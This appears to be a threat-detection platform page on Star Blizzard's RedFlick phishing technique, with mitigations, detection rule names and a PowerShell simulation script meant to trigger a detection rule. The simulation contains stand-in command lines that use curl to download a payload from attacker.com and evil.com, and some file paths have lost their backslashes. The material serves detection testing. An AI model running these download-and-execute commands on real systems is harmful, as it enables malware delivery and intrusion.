Star Blizzard Uses RedFlick to Enhance Phishing and Malware Deployment
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
Russian state-sponsored actor Star Blizzard has evolved its tradecraft using the RedFlick technique to deliver the CosmicPulse backdoor. The actor has shifted from highly targeted spear-phishing to larger-scale automated phishing campaigns using compromised websites. These campaigns utilize sophisticated delivery methods including VHDX files and payloads hidden within PDF files to evade detection.
Investigation
Microsoft Threat Intelligence analyzed various phishing waves observed throughout 2026, identifying a transition from ClickFix-based chains to RedFlick scheduled tasks. The investigation detailed a multi-stage execution flow involving LNK files, SSH local command execution, and the use of WebDAV for remote payload retrieval. Technical analysis also uncovered the use of steganography and registry-based encryption for the CosmicPulse payload.
Mitigation
Organizations should implement phishing-resistant authentication and conditional access policies to secure identities. Endpoint protection should be configured with EDR in block mode and real-time antivirus protection enabled. Additionally, implementing attack surface reduction rules can prevent the execution of obfuscated scripts and unauthorized executable files.
Response
Upon detection, security teams should utilize EDR to remediate malicious artifacts and investigate suspicious sign-in attempts. Automated investigation and remediation modes should be enabled to reduce response times. Organizations should also use advanced anti-phishing solutions and Zero-hour auto purge to neutralize incoming malicious communications.
Attack Flow
We are still updating this part.
Detections
Suspicious Command Line Contains UNC Path with Executable as an Argument (via cmdline)
Possible Network Shares Discovery (via cmdline)
Suspicious MsiExec Remote Installer Hidden Installation Attempts (via cmdline)
LOLBAS Conhost (via cmdline)
Possible Tunneling Tool Usage [Windows] (via cmdline)
Suspicious CURL Usage (via cmdline)
Suspicious Command and Control by Unusual Top Level Domain (TLD) DNS Request (via dns)
IOCs (HashSha256) to detect: Star Blizzard refines phishing and malware delivery with the RedFlick technique
IOCs (SourceIP) to detect: Star Blizzard refines phishing and malware delivery with the RedFlick technique
IOCs (DestinationIP) to detect: Star Blizzard refines phishing and malware delivery with the RedFlick technique
Detect PowerShell Execution from Download PDF [Windows Powershell]
Detection of Star Blizzard RedFlick Technique – Scheduled Tasks and Command-Line Execution [Windows Process Creation]
Simulation Execution
-
Attack Narrative & Commands: The adversary delivers a phishing email containing a link to a malicious file. Upon interaction, a sequence is triggered where
curlis utilized to fetch a secondary stage. To blend in with system processes, the command is crafted to explicitly include the termsPowerShell,PDF(referencing the source of the trigger), andconhost.exein the command line string to match the logic of the target detection rule. The goal is to execute a decoded payload embedded within a PDF structure. -
Regression Test Script:
# Simulation script to trigger the 'Detect PowerShell Execution from Download PDF' rule. # This script constructs a command line string that includes all four required keywords. $fakePdfPath = "C:UsersPublicDocumentsinvoice_decoy.PDF" $cmd = "cmd.exe /c curl -o payload.exe http://attacker.com/shell.exe && PowerShell.exe -Command `& {Write-Host 'Extracting from PDF...'; Start-Process conhost.exe}" # We execute via cmd to ensure conhost.exe is part of the process tree/command context Start-Process cmd.exe -ArgumentList "/c curl -o data.bin http://evil.com/ & PowerShell -Command `"Extracting from PDF... using conhost.exe`"" -
Cleanup Commands:
# Cleanup files generated during simulation Remove-Item -Path "C:UsersPublicDocumentsinvoice_decoy.PDF" -ErrorAction SilentlyContinue Remove-Item -Path "data.bin" -ErrorAction SilentlyContinue Remove-Item -Path "payload.exe" -ErrorAction SilentlyContinue